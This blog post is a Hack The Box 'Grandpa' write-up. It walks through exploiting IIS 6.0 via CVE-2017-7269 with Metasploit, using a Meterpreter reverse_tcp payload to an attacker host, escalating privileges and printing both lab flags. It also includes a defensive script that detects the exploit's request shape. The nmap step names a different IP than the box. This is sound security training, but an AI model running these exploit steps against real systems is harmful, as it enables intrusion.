Friday 10 April 2020

10.10.10.14 GRANDPA hackthebox machine writeup

GRANDPA 10.10.10.14 Write Up

Machine Created by ch4p

Tools Used for Enumeration:

1. nmap

Tools Used for Exploitation:

1. searchsploit
2. metasploit

Steps for primary enumeration:

1. First we use nmap (the Network Mapper tool) to scan the box IP. Running it gives us a list of open ports and the services running on them. On the Grandpa box we can see one open port and service: port 80, running Microsoft IIS httpd 6.0.

Command used: nmap -A 10.10.10.8

Steps to get user.txt: 

1. When we search for an IIS 6.0 exploit with the searchsploit command "searchsploit -t Microsoft IIS 6.0", we get an RCE vulnerability to exploit.

2. After opening it on the Exploit-DB site, we get the CVE number, CVE-2017-7269. Link: https://www.exploit-db.com/exploits/41738.
3. Searching for the CVE number in Metasploit shows an exploit, so we can use the module "exploit/windows/iis/iis_webdav_scstoragepathfromurl" to get a Meterpreter session.
4. Let's use the exploit with "set rhosts 10.10.10.14", "set lhost 10.10.14.4" and "set payload windows/meterpreter/reverse_tcp".
5. Meterpreter is unable to getuid, so we background the session and search for a local exploit for privilege escalation.
6. We search for local exploits with the "post/multi/recon/local_exploit_suggester" module, which gives us some modules for privilege escalation.
7. After selecting a suitable module and the session, we run it to get a privileged Meterpreter shell.
8. Now we can navigate to the Desktop of user Harry and get the user flag. Command used: cat "C:\Documents and Settings\Harry\Desktop\user.txt"
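
The Metasploit module used above targets the WebDAV overflow tracked as CVE-2017-7269, whose public description is a long header beginning with "If: <http://" in a PROPFIND request against IIS 6.0. As an added example (not part of the original writeup and not code from the Metasploit module), here is a small Python triage script a defender could run over captured HTTP request heads to flag that request shape, plus a check for the end-of-life server banner that the nmap step reported. The sample requests, the 512-byte "If:" threshold and the function names are constructed assumptions for this example.

```python
"""Triage captured HTTP request heads for the CVE-2017-7269 request shape.

All sample traffic below is constructed for this example; the 512-byte
threshold is an assumption: benign WebDAV "If:" headers carry one or two
lock tokens and stay far shorter than the overlong header the CVE describes.
"""
from typing import Dict, List

MAX_IF_HEADER_LEN = 512          # assumed threshold for a benign "If:" header
EOL_SERVER_BANNERS = ("Microsoft-IIS/6.0",)   # IIS 6.0 ships with Server 2003 (end of life)


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.x request head into method, path and lowercased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)   # split on the first colon only
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_suspicious_propfind(req: Dict[str, object]) -> bool:
    """True for a PROPFIND whose "If:" header starts with "<http://" and is overlong."""
    if str(req["method"]).upper() != "PROPFIND":
        return False
    if_header = req["headers"].get("if", "")      # type: ignore[union-attr]
    return if_header.startswith("<http://") and len(if_header) > MAX_IF_HEADER_LEN


def is_eol_iis(server_header: str) -> bool:
    """True when a Server response header names an end-of-life IIS build."""
    return any(server_header.startswith(b) for b in EOL_SERVER_BANNERS)


def triage(requests: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request that matches the CVE-2017-7269 shape."""
    findings = []
    for index, raw in enumerate(requests):
        req = parse_request(raw)
        if is_suspicious_propfind(req):
            findings.append({
                "index": index,
                "path": req["path"],
                "if_len": len(req["headers"]["if"]),   # type: ignore[index]
            })
    return findings


# Constructed sample traffic: a plain GET, a normal WebDAV PROPFIND with a
# lock token, and a PROPFIND carrying an overlong "If:" header (filler only).
BENIGN_GET = "GET / HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n"
BENIGN_PROPFIND = (
    "PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
    "If: <http://10.10.10.14/docs/> (<opaquelocktoken:deadbeef>)\r\n\r\n"
)
OVERLONG_PROPFIND = (
    "PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/" + "A" * 1000 + ">\r\n\r\n"
)

if __name__ == "__main__":
    for finding in triage([BENIGN_GET, BENIGN_PROPFIND, OVERLONG_PROPFIND]):
        print("suspicious PROPFIND:", finding)
    print("EOL IIS banner:", is_eol_iis("Microsoft-IIS/6.0"))
```

The header check is a cheap network-side signal; the durable fix is on the host, since IIS 6.0 and Windows Server 2003 were already out of support when the CVE was published, so the options are disabling WebDAV on such a host or retiring it.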

Steps to get root.txt:

1. Now we can use the command cat "C:\Documents and Settings\Administrator\Desktop\root.txt" to get the root flag.

Flags:

1. user.txt flag: bdff5ec67c3cff017f2bedc146a5d869
2. root.txt flag: 9359e905a2c35f861f6a57cecf28bb7b

References:

1. https://medium.com/@ranakhalil101/hack-the-box-grandpa-writeup-w-metasploit-e0b5cbc87aca

Videos:

1. Ippsec walkthrough: https://www.youtube.com/watch?v=v_4ECH8phmw
